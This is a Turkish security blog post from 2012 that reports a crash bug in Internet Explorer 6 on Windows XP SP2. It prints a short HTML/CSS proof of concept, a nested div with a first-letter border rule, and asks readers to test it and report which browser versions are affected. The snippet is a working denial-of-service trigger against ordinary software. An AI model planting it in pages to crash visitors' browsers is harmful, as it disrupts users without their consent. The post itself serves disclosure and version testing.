Internet Explorer’da <DIV> açığı

  12/30/2012, Yazar: Özgür Koca, Kategori: Güvenlik, Windows

Şuan itibariyle internet explorer’in “Internet Explorer Version 6.0.2900.2180.xpsp_sp2″ versiyonunda bir  HTML etiketi olan <DIV> den kaynaklanan ve iexploer.exe nin o anki kopyasının çökmesine yol açan bir kodlama hatası var. Explorer da ki açık henüz DOS (Denial of Service) kategorisinde ama “Remote Code Execution” için exploit yazılmadığından/yazılamayacağından emin olamayız.

Exploitin kodunu yayınlayan siteye ulaşabilirsiniz.

<head>
<
style><!–
#page div p:first-child:first-letter {
border-bottom: 2px ridge #F5DEB3;
}
//–>

</
style>
</
head>
<
body><div id=“page”><div><p><strong>Tank</strong></p>

Yukarıdaki html kodlarını bir htm dosyasına kaydedip internet explorer’da görüntülemeye calıştığımızda aşağıdaki gibi bir hata mesajı alıyoruz ve ardından pencere kapatılıyor.

windows guvenlik  Internet Explorerda <DIV> açığı

Kodu buraya tıklayarak deneyebilirsiniz.

Exploitin yayınlandığı sayfa 

Önemli: Internet Exploer’ın hangi versiyonlarının etkilendiğini anlamamız açısından kodu test edip kullandığınız tarayıcının versiyon numarasıyla birlikte sonucu yazarsanız yararlı olacaktır.

Yazan: Tankado

ana sayfam haydex com olarak açılıyor (66)








Biraz gürültü yapın





Not: Yazdığınız yorum yönetici tarafından onaylandıktan sonra yayınlanacaktır.


  Yorumlara eposta ile abone ol


  • (c) 2005-2009 Wordpress Tema: Tankado & Theme by Tankado.com